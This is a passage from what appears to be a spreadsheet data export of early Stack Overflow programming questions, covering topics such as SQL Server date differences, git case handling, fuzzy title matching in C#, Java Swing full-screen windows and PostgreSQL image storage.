&lt;p&gt;I'm working on a regression testing app.  I'm displaying a form on the screen and according to which user is logged in to the app some of the fields should be read-only.  So I can abstract a field object and I can abstract a user object but what pattern should I be looking at to describe the intersection of these two concepts?  In other words how should I describe that for Field 1 and User A, the field should be read-only?  It seems like read-only (or not) should be a property of the Field class but as I said, it depends on which user is looking at the form.  I've considered a simple two-dimensional array (e. g. ReadOnly[Field,User] = True) but I want to make sure I've picked the most effective structure to represent this.    &lt;/p&gt;
&lt;p&gt;Are there any software design patterns regarding this kind of data structure?  Am I overcomplicating things--would a two-dimensional array be the best way to go here?  As I said if this has been asked and answered, I do apologize.  I did search here and didn't find anything and a Google search failed to turn up anything either. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server best way to calculate datediff between current row and next row?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got the following rough structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Object -&amp;gt; Object Revisions -&amp;gt; Data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The Data can be shared between several Objects.&lt;/p&gt;
&lt;p&gt;What I'm trying to do is clean out old Object Revisions. I want to keep the first, active, and a spread of revisions so that the last change for a time period is kept. The Data might be changed a lot over the course of 2 days then left alone for months, so I want to keep the last revision before the changes started and the end change of the new set.&lt;/p&gt;
&lt;p&gt;I'm currently using a cursor and temp table to hold the IDs and date between changes so I can select out the low hanging fruit to get rid of. This means using @LastID, @LastDate, updates and inserts to the temp table, etc... &lt;/p&gt;
&lt;p&gt;Is there an easier/better way to calculate the date difference between the current row and the next row in my initial result set without using a cursor and temp table? &lt;/p&gt;
&lt;p&gt;I'm on sql server 2000, but would be interested in any new features of 2005, 2008 that could help with this as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I find and decouple entities from a certificate when upgrading MS-SQLServer editions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;While in the final throws of upgrading MS-SQL Server 2005 Express Edition to MS-SQL Server 2005 Enterprise Edition, I came across this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The certificate cannot be dropped because one or more entities are either signed or encrypted using it. To continue, correct the problem...&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, &lt;strong&gt;how do I find and decouple the entities signed/encrypted using this certificate so I can delete the certificate and proceed with the upgrade?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm also kind of expecting/assuming that the upgrade setup will provide a new certificate and re-couple those former entities with it or I'll have to forcibly do so after the setup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are off-the-cloud desktop applications dead?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Although somewhat related to &lt;a href="http://stackoverflow.com/questions/4409/is-the-desktop-app-dead" rel="nofollow"&gt;this question&lt;/a&gt;, I have what I think is a different take on it.&lt;/p&gt;
&lt;p&gt;Is a desktop app that has no connections to the "cloud" dead? I believe that some things are going to continue to be on the machine (operating systems obviously, browsers, some light-weight applications), but more and more things are moving to network-based applications (see Google Docs for office suites, GMail and other web-email clients for email, flickr for photo management, and more).&lt;/p&gt;
&lt;p&gt;So other than the lightweight applications, is there anything that, in 5 to 10 years, will continue to be (either out of necessity or just demand) remain on the desktop and off the cloud?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the comma operator , do in C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does the &lt;code&gt;,&lt;/code&gt; operator do in C?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the PDB get me while debugging and how do I know it's working?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to use a third-party component without source code. I have the release DLL and release PDB file. Let's call it 'CorporateComponent.dll'. My own code creates objects from this DLL and calls methods on these objects.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CorpObject o = new CorpObject();
Int32 result = o.DoSomethingLousy();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;While debugging, the method 'DoSomethingLousy' throws an exception. What does the PDB file do for me? If it does something nice, how can I be sure I'm making use of it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Perform token replacements using VS post-build event command?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to "post-process" my app.config file and perform some token replacements after the project builds.&lt;/p&gt;
&lt;p&gt;Is there an &lt;em&gt;easy&lt;/em&gt; way to do this using a &lt;a href="http://msdn.microsoft.com/en-us/library/42x5kfw4(VS.80).aspx" rel="nofollow"&gt;VS post-build event&lt;/a&gt; command?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(Yeah I know I could probably use NAnt or something, looking for something simple.)&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inform potential clients about security vulnerabilities?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a lot of open discussions with potential clients, and they ask frequently about our level of technical expertise, including the scope of work for our current projects. The first thing I do in order to gauge the level of expertise on staff they have now or have previously used is to check for security vulnerabilities like XSS and SQL injection. I have yet to find a potential client who is vulnerable, but I started to wonder, would they actually think this investigation was helpful, or would they think, "um, these guys will trash our site if we don't do business with them." Non-technical folks get scared pretty easily by this stuff, so I'm wondering is this a show of good faith, or a poor business practice?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Google Reader API Unread Count</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does Google Reader have an API and if so, how can I get the count of the number of unread posts for a specific user knowing their username and password?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make git ignore changes in case?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm not too sure what is going on here, but sometimes a particular file in my repository will change the case of it's name. e.g.,:&lt;/p&gt;
&lt;p&gt;before: &lt;code&gt;File.h&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;after: &lt;code&gt;file.h&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I don't really care why this is happening, but this causes git to think it is a new file, and then I have to go and change the file name back. Can you just make git ignore case changes?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;[edit]&lt;/strong&gt;
I suspect it is Visual Studio doing something weird with that particular file, because it seems to happen most often when I open and save it after changes. I don't have any way to fix bugs in VS however, but git should be a bit more capable I hope.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Examples for coding against the PayPal API in .NET 2.0+?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone point me to a good introduction to coding against the paypal API?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an ASP.NET pagination control (Not MVC)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a search results page that basically consists of a repeater with content in it.  What I need is a way to paginate the results.  Getting paginated results isn't the problem, what I'm after is a web control that will display a list of the available paged data, preferably by providing the number of results and a page size&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Retaining HTTP POST data when a request is interrupted by a login page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say a user is browsing a website, and then performs some action which changes the database (let's say they add a comment). When the request to actually add the comment comes in, however, we find we need to force them to login before they can continue.&lt;/p&gt;
&lt;p&gt;Assume the login page asks for a username and password, and redirects the user back to the URL they were going to when the login was required. That redirect works find for a URL with only GET parameters, but if the request originally contained some HTTP POST data, that is now lost.&lt;/p&gt;
&lt;p&gt;Can anyone recommend a way to handle this scenario when HTTP POST data is involved?&lt;/p&gt;
&lt;p&gt;Obviously, if necessary, the login page could dynamically generate a form with all the POST parameters to pass them along (though that seems messy), but even then, I don't know of any way for the login page to redirect the user on to their intended page while keeping the POST data in the request.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; : One extra constraint I should have made clear - Imagine we don't know if a login will be required until the user submits their comment. For example, their cookie might have expired between when they loaded the form and actually submitted the comment.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How could I get my SVN-only host to pull from a git repository?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd really like to get our host to pull from our Git repository instead of uploading files manually, but it doesn't have Git installed.&lt;/p&gt;
&lt;p&gt;So is there a way to trick Subversion (which they do have) into checking out a Git repository?&lt;/p&gt;
&lt;p&gt;I think I already know the answer, namely bug my host to add Git and live with it until they do, but I thought I would ask anyway.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where are people getting that rotaty loading image?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I keep running across this loading image&lt;/p&gt;
&lt;p&gt;&lt;a href="http://georgia.ubuntuforums.com/images/misc/lightbox_progress.gif" rel="nofollow"&gt;http://georgia.ubuntuforums.com/images/misc/lightbox_progress.gif&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;which seems to have entered into existence in the last 18 months.  All of a sudden it is in every application and is on every web site.  Not wanting to be left out is there somewhere I can get this logo, perhaps with a transparent background?  Also where did it come from?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>When building a Handler, should it be .ashx or .axd?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I'm building an ASP.Net class that inherits from IHttpHandler, should I wire this up to a URL ending in .ashx, or should I use the .axd extension? &lt;/p&gt;
&lt;p&gt;Does it matter as long as there's no naming conflict?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fuzzy text (sentences/titles) matching in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey, I'm using &lt;a href="http://en.wikipedia.org/wiki/Levenshtein_distance"&gt;Levenshteins&lt;/a&gt; algorithm to get distance between source and target string.&lt;/p&gt;
&lt;p&gt;also I have method which returns value from 0 to 1:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;
/// Gets the similarity between two strings.
/// All relation scores are in the [0, 1] range, 
/// which means that if the score gets a maximum value (equal to 1) 
/// then the two string are absolutely similar
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;param name="string1"&amp;gt;The string1.&amp;lt;/param&amp;gt;
/// &amp;lt;param name="string2"&amp;gt;The string2.&amp;lt;/param&amp;gt;
/// &amp;lt;returns&amp;gt;&amp;lt;/returns&amp;gt;
public static float CalculateSimilarity(String s1, String s2)
{
    if ((s1 == null) || (s2 == null)) return 0.0f;
    float dis = LevenshteinDistance.Compute(s1, s2);
    float maxLen = s1.Length;
    if (maxLen &amp;lt; s2.Length)
        maxLen = s2.Length;
    if (maxLen == 0.0F)
        return 1.0F;
    else return 1.0F - dis / maxLen;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this for me is not enough. Because I need more complex way to match two sentences.&lt;/p&gt;
&lt;p&gt;For example I want automatically tag some music, I have original song names, and i have songs with trash, like &lt;em&gt;super, quality,&lt;/em&gt; years like &lt;em&gt;2007, 2008,&lt;/em&gt; etc..etc.. also some files have just &lt;a href="http://trash..thash..song_name_mp3.mp3"&gt;http://trash..thash..song_name_mp3.mp3&lt;/a&gt;, other are normal. I want to create an algorithm which will work just more perfect than mine now.. Maybe anyone can help me?&lt;/p&gt;
&lt;p&gt;here is my current algo:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;
/// if we need to ignore this target.
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;param name="targetString"&amp;gt;The target string.&amp;lt;/param&amp;gt;
/// &amp;lt;returns&amp;gt;&amp;lt;/returns&amp;gt;
private bool doIgnore(String targetString)
{
    if ((targetString != null) &amp;amp;&amp;amp; (targetString != String.Empty))
    {
        for (int i = 0; i &amp;lt; ignoreWordsList.Length; ++i)
        {
            //* if we found ignore word or target string matching some some special cases like years (Regex).
            if (targetString == ignoreWordsList[i] || (isMatchInSpecialCases(targetString))) return true;
        }
    }
   return false;
}
/// &amp;lt;summary&amp;gt;
/// Removes the duplicates.
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;param name="list"&amp;gt;The list.&amp;lt;/param&amp;gt;
private void removeDuplicates(List&amp;lt;String&amp;gt; list)
{
    if ((list != null) &amp;amp;&amp;amp; (list.Count &amp;gt; 0))
    {
        for (int i = 0; i &amp;lt; list.Count - 1; ++i)
        {
            if (list[i] == list[i + 1])
            {
                list.RemoveAt(i);
                --i;
            }
        }
    }
}
/// &amp;lt;summary&amp;gt;
/// Does the fuzzy match.
/// &amp;lt;/summary&amp;gt;
/// &amp;lt;param name="targetTitle"&amp;gt;The target title.&amp;lt;/param&amp;gt;
/// &amp;lt;returns&amp;gt;&amp;lt;/returns&amp;gt;
private TitleMatchResult doFuzzyMatch(String targetTitle)
{
    TitleMatchResult matchResult = null;
   if (targetTitle != null &amp;amp;&amp;amp; targetTitle != String.Empty)
   {
       try
       {
           //* change target title (string) to lower case.
           targetTitle = targetTitle.ToLower();
           //* scores, we will select higher score at the end.
           Dictionary&amp;lt;Title, float&amp;gt; scores = new Dictionary&amp;lt;Title, float&amp;gt;();
           //* do split special chars: '-', ' ', '.', ',', '?', '/', ':', ';', '%', '(', ')', '#', '\"', '\'', '!', '|', '^', '*', '[', ']', '{', '}', '=', '!', '+', '_'
           List&amp;lt;String&amp;gt; targetKeywords = new List&amp;lt;string&amp;gt;(targetTitle.Split(ignoreCharsList, StringSplitOptions.RemoveEmptyEntries));
          //* remove all trash from keywords, like super, quality, etc..
           targetKeywords.RemoveAll(delegate(String x) { return doIgnore(x); });
          //* sort keywords.
          targetKeywords.Sort();
        //* remove some duplicates.
        removeDuplicates(targetKeywords);
        //* go through all original titles.
        foreach (Title sourceTitle in titles)
        {
            float tempScore = 0f;
            //* split orig. title to keywords list.
            List&amp;lt;String&amp;gt; sourceKeywords = new List&amp;lt;string&amp;gt;(sourceTitle.Name.Split(ignoreCharsList, StringSplitOptions.RemoveEmptyEntries));
            sourceKeywords.Sort();
            removeDuplicates(sourceKeywords);
            //* go through all source ttl keywords.
            foreach (String keyw1 in sourceKeywords)
            {
                float max = float.MinValue;
                foreach (String keyw2 in targetKeywords)
                {
                    float currentScore = StringMatching.StringMatching.CalculateSimilarity(keyw1.ToLower(), keyw2);
                    if (currentScore &amp;gt; max)
                    {
                        max = currentScore;
                    }
                }
                tempScore += max;
            }
            //* calculate average score.
            float averageScore = (tempScore / Math.Max(targetKeywords.Count, sourceKeywords.Count)); 
            //* if average score is bigger than minimal score and target title is not in this source title ignore list.
            if (averageScore &amp;gt;= minimalScore &amp;amp;&amp;amp; !sourceTitle.doIgnore(targetTitle))
            {
                //* add score.
                scores.Add(sourceTitle, averageScore);
            }
        }
        //* choose biggest score.
        float maxi = float.MinValue;
        foreach (KeyValuePair&amp;lt;Title, float&amp;gt; kvp in scores)
        {
            if (kvp.Value &amp;gt; maxi)
            {
                maxi = kvp.Value;
                matchResult = new TitleMatchResult(maxi, kvp.Key, MatchTechnique.FuzzyLogic);
            }
        }
    }
    catch { }
}
//* return result.
return matchResult;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works normally but just in some cases, a lot of titles which should match, does not match... I think I need some kind of formula to play with weights and etc, but i can't think of one.. &lt;/p&gt;
&lt;p&gt;Ideas? Suggestions? Algos?&lt;/p&gt;
&lt;p&gt;by the way I already know this topic (My colleague already posted it but we cannot come with a proper solution for this problem.): 
&lt;a href="http://stackoverflow.com/questions/49263/approximate-string-matching-algorithms"&gt;http://stackoverflow.com/questions/49263/approximate-string-matching-algorithms&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to properly link your a custom css file in sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a custom list, and made some changes to the way the CQWP renders it on a page by modifying ItemStyle.xsl. However, I'd like to use some custom css classes and therefore I'd like to link to my own custom .css file from the head tag of the pages containing this CQWP.&lt;/p&gt;
&lt;p&gt;So my question is, where to do put my .css file and how do I link it properly to a page containing the CQWPs. Please have in mind that I'm making a solution that should be deployed on multi sharepoint installations.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to efficiently SQL select newest entries from a MySQL database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/49404/sql-query-to-get-latest-price"&gt;SQL Query to get latest price&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have a database containing stock price history. I want to select most recent prices for every stock that is listed. I know PostreSQL has a &lt;a href="http://stackoverflow.com/questions/25224/joining-latest-of-various-usermetadata-tags-to-user-rows#27159"&gt;DISTINCT ON&lt;/a&gt; statement that would suit ideally here.&lt;/p&gt;
&lt;p&gt;Table columns are &lt;code&gt;name&lt;/code&gt;, &lt;code&gt;closingPrice&lt;/code&gt; and &lt;code&gt;date&lt;/code&gt;; &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;date&lt;/code&gt; together form a unique index.&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;easiest&lt;/em&gt; (and very uneffective) way is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM stockPrices s
WHERE s.date =
(SELECT MAX(date) FROM stockPrices si WHERE si.name = s.name);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Much better approach I found is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT *
FROM stockPrices s JOIN (
  SELECT name, MAX(date) AS date
  FROM stockPrices si
  GROUP BY name
) lastEntry ON s.name = lastEntry.name AND s.date = lastEntry.date;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What would be an efficient way to do this? What indexes should I create?&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;duplicate of:&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/49404/sql-query-to-get-latest-price"&gt;SQL Query to get latest price&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>Why does windows XP minimize my swing full screen window on my second screen?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the application I'm developping (in Java/swing), I have to show a full screen window on the &lt;em&gt;second&lt;/em&gt; screen of the user.
I did this using a code similar to the one you'll find below...
Be, as soon as I click in a window opened by windows explorer, or as soon as I open windows explorer (i'm using windows XP), the full screen window is minimized...&lt;/p&gt;
&lt;p&gt;Do you know any way or workaround to fix this problem, or is there something important I did not understand with full screen windows?&lt;/p&gt;
&lt;p&gt;Thanks for the help,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import javax.swing.JFrame;
import javax.swing.JPanel;
import javax.swing.JWindow;
import java.awt.BorderLayout;
import java.awt.Dimension;
import java.awt.GraphicsDevice;
import java.awt.GraphicsEnvironment;
import java.awt.Window;
import javax.swing.JButton;
import javax.swing.JToggleButton;
import java.awt.Rectangle;
import java.awt.GridBagLayout;
import javax.swing.JLabel;
public class FullScreenTest {
    private JFrame jFrame = null;  //  @jve:decl-index=0:visual-constraint="94,35"
    private JPanel jContentPane = null;
    private JToggleButton jToggleButton = null;
    private JPanel jFSPanel = null;  //  @jve:decl-index=0:visual-constraint="392,37"
    private JLabel jLabel = null;
    private Window window;
    /**
     * This method initializes jFrame	
     * 	
     * @return javax.swing.JFrame	
     */
    private JFrame getJFrame() {
    	if (jFrame == null) {
    		jFrame = new JFrame();
    		jFrame.setSize(new Dimension(474, 105));
    		jFrame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
    		jFrame.setContentPane(getJContentPane());
    	}
    	return jFrame;
    }
    /**
     * This method initializes jContentPane	
     * 	
     * @return javax.swing.JPanel	
     */
    private JPanel getJContentPane() {
    	if (jContentPane == null) {
    		jContentPane = new JPanel();
    		jContentPane.setLayout(null);
    		jContentPane.add(getJToggleButton(), null);
    	}
    	return jContentPane;
    }
    /**
     * This method initializes jToggleButton	
     * 	
     * @return javax.swing.JToggleButton	
     */
    private JToggleButton getJToggleButton() {
    	if (jToggleButton == null) {
    		jToggleButton = new JToggleButton();
    		jToggleButton.setBounds(new Rectangle(50, 23, 360, 28));
    		jToggleButton.setText("Show Full Screen Window on 2nd screen");
    		jToggleButton.addActionListener(new java.awt.event.ActionListener() {
    			public void actionPerformed(java.awt.event.ActionEvent e) {
    				showFullScreenWindow(jToggleButton.isSelected());
    			}
    		});
    	}
    	return jToggleButton;
    }
    protected void showFullScreenWindow(boolean b) {
    	if(window==null){
    		window = initFullScreenWindow();
    	}
    	window.setVisible(b);
    }
    private Window initFullScreenWindow() {
    	GraphicsEnvironment ge = GraphicsEnvironment.getLocalGraphicsEnvironment();
    	GraphicsDevice[] gds = ge.getScreenDevices();
    	GraphicsDevice gd = gds[1];
    	JWindow window = new JWindow(gd.getDefaultConfiguration());
    	window.setContentPane(getJFSPanel());
    	gd.setFullScreenWindow(window);
    	return window;
    }
    /**
     * This method initializes jFSPanel	
     * 	
     * @return javax.swing.JPanel	
     */
    private JPanel getJFSPanel() {
    	if (jFSPanel == null) {
    		jLabel = new JLabel();
    		jLabel.setBounds(new Rectangle(18, 19, 500, 66));
    		jLabel.setText("Hello ! Now, juste open windows explorer and see what happens...");
    		jFSPanel = new JPanel();
    		jFSPanel.setLayout(null);
    		jFSPanel.setSize(new Dimension(500, 107));
    		jFSPanel.add(jLabel, null);
    	}
    	return jFSPanel;
    }
    /**
     * @param args
     */
    public static void main(String[] args) {
    	FullScreenTest me = new FullScreenTest();
    	me.getJFrame().setVisible(true);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Returning an element from a List in Scala</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently been working on a beginner's project in Scala, and have a beginner question about Scala's Lists.&lt;/p&gt;
&lt;p&gt;Say I have a list of tuples ( &lt;code&gt;List[Tuple2[String, String]]&lt;/code&gt;, for example). Is there a convenience method to return the first occurence of a specified tuple from the List, or is it necessary to iterate through the list by hand?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get the logged in Windows domain account from an ASP.NET application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an ASP.NET application that manages it's own User, Roles and Permission database and we have recently added a field to the User table to hold the Windows domain account.  &lt;/p&gt;
&lt;p&gt;I would like to make it so that the user doesn't have to  &lt;strong&gt;physically&lt;/strong&gt; log in to our application, but rather would be automatically logged in based on the currently logged in Windows domain account DOMAIN\username.  We want to authenticate the Windows domain account against our own User table.  &lt;/p&gt;
&lt;p&gt;This is a piece of cake to do in Windows Forms, is it possible to do this in Web Forms?&lt;/p&gt;
&lt;p&gt;I don't want the user to be prompted with a Windows challenge screen,  I want our system to handle the log in.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;: We are using our own custom Principal object.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;: Not sure if it makes a difference or not, but we are using IIS7.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Encrypting appSettings in web.config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a web app which requires a username and password to be stored in the web.Config, it also refers to some URLs which will be requested by the web app itself and never the client.&lt;/p&gt;
&lt;p&gt;I know the .Net framework will not allow a web.config file to be served, however I still think its bad practice to leave this sort of information in plain text.  &lt;/p&gt;
&lt;p&gt;Everything I have read so far requires me to use a command line switch or to store values in the registry of the server.  I have access to neither of these as the host is online and I have only FTP and Control Panel (helm) access.&lt;/p&gt;
&lt;p&gt;Can anyone recommend any good, free encryption DLL's or methods which I can use?  I'd rather not develop my own!&lt;/p&gt;
&lt;p&gt;Thanks for the feedback so far guys but I am not able to issue commands and and not able to edit the registry.  Its going to have to be an encryption util/helper but just wondering which one!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>CakePHP ACL Database Setup: ARO / ACO structure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm struggling to implement ACL in CakePHP.  After reading the documentation in the &lt;a href="http://manual.cakephp.org/view/171/Access-Control-Lists"&gt;cake manual&lt;/a&gt; as well as several other tutorials, blog posts etc, I found Aran Johnson's excellent tutorial which has helped fill in many of the gaps.  His examples seem to conflict with others I've seen though in a few places - specifically in the ARO tree structure he uses.&lt;/p&gt;
&lt;p&gt;In his &lt;a href="http://aranworld.com/article/169/acl-and-auth-tutorial-database-setup"&gt;examples&lt;/a&gt; his user groups are set up as a cascading tree, with the most general user type being at the top of the tree, and its children branching off for each more restricted access type.  Elsewhere I've usually seen each user type as a child of the same generic user type.  &lt;/p&gt;
&lt;p&gt;How do you set up your AROs and ACOs in CakePHP?  Any and all tips appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem rolling out ADO.Net Data Service application to IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am adding a ADO.Net Data Service lookup feature to an existing web page.  Everything works great when running from visual studio, but when I roll it out to IIS, I get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Request Error&lt;/strong&gt;&lt;br&gt;The server encountered an error processing the request. See server logs for more details.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I get this even when trying to display the default page, i.e.:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;a href="http://server/FFLookup.svc"&gt;http://server/FFLookup.svc&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have 3.5 SP1 installed on the server.&lt;/p&gt;
&lt;p&gt;What am I missing, and which "Server Logs" is it refering to?  I can't find any further error messages.&lt;/p&gt;
&lt;p&gt;There is nothing in the Event Viewer logs (System or Application), and nothing in the IIS logs other than the GET:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;2008-09-10 15:20:19 10.7.131.71 GET /FFLookup.svc - 8082 - 10.7.131.86 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-US)+AppleWebKit/525.13+(KHTML,+like+Gecko)+Chrome/0.2.149.29+Safari/525.13 401 2 2148074254&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is no stack trace returned.  The only response I get is the "Request Error" as noted above.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;p&gt;Patrick&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding Items Using DataBinding from TreeView to ListBox WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to add the selected item from the &lt;code&gt;TreeView&lt;/code&gt; to the &lt;code&gt;ListBox&lt;/code&gt; control using &lt;code&gt;DataBinding&lt;/code&gt; (If it can work with &lt;code&gt;DataBinding&lt;/code&gt;). &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;TreeView HorizontalAlignment="Left" 
          Margin="30,32,0,83" 
          Name="treeView1" 
          Width="133" &amp;gt;
&amp;lt;/TreeView&amp;gt;
&amp;lt;ListBox VerticalAlignment="Top" 
         Margin="208,36,93,0" 
         Name="listBox1" 
         Height="196" &amp;gt;       
&amp;lt;/ListBox&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;TreeView&lt;/code&gt; is populated from the code behind page with some dummy data. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing Images in PostgreSQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Alright, so I'm working on an application which will use a Linux back-end running PostgreSQL to serve up images to a Windows box with the front end written in C#.NET, though the front-end should hardly matter.  My question is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;What is the best way to deal with storing images in Postgres?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The images are around 4-6 megapixels each, and we're storing upwards of 3000.  It might also be good to note: this is not a web application, there will at most be about two front-ends accessing the database at once.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unfiltering NSPasteboard</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to unfilter an NSPasteboard for what the source application specifically declared it would provide?&lt;/p&gt;
&lt;p&gt;I'm attempting to serialize pasteboard data in my application.  When another application places an RTF file on a pasteboard and then I ask for the available types, I get eleven different flavors of said RTF, everything from the original RTF to plain strings to dyn.* values.  &lt;/p&gt;
&lt;p&gt;Saving off all that data into a plist or raw data on disk isn't usually a problem as it's  pretty small, but when an image of any considerable size is placed on the pasteboard, the resulting output can be tens of times larger than the source data (with multiple flavors of TIFF and PICT data being made available via filtering).&lt;/p&gt;
&lt;p&gt;I'd like to just be able to save off what the original app made available if possible.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;John, you are far more observant than myself or the gentleman I work with who's been doing Mac programming since dinosaurs roamed the earth.  Neither of us ever noticed the text you highlighted... and I've not a clue why.  Starting too long at the problem, apparently.&lt;/p&gt;
&lt;p&gt;And while I accepted your answer as the correct answer, it doesn't exactly answer my original question.  What I was looking for was a way to identify flavors that can become  other flavors simply by placing them on the pasteboard &lt;strong&gt;AND&lt;/strong&gt; to know which of these types were originally offered by the provider.  While walking the types list will get me the preferred order for the application that provided them, it won't tell me which ones I can safely ignore as they'll be recreated when I refill the pasteboard later.&lt;/p&gt;
&lt;p&gt;I've come to the conclusion that there isn't a "good" way to do this.  &lt;code&gt;[NSPasteboard declaredTypesFromOwner]&lt;/code&gt; would be fabulous, but it doesn't exist.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ClickOnce Deployment, system update required Microsoft.mshtml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an application that works with MS Office and uses Microsoft.mshtml.dll. We use ClickOnce to deploy the application. The application deploys without issues on most machines, but sometimes we get errors saying "System Update Required, Microsoft.mshtl.dll should be in the GAC". &lt;/p&gt;
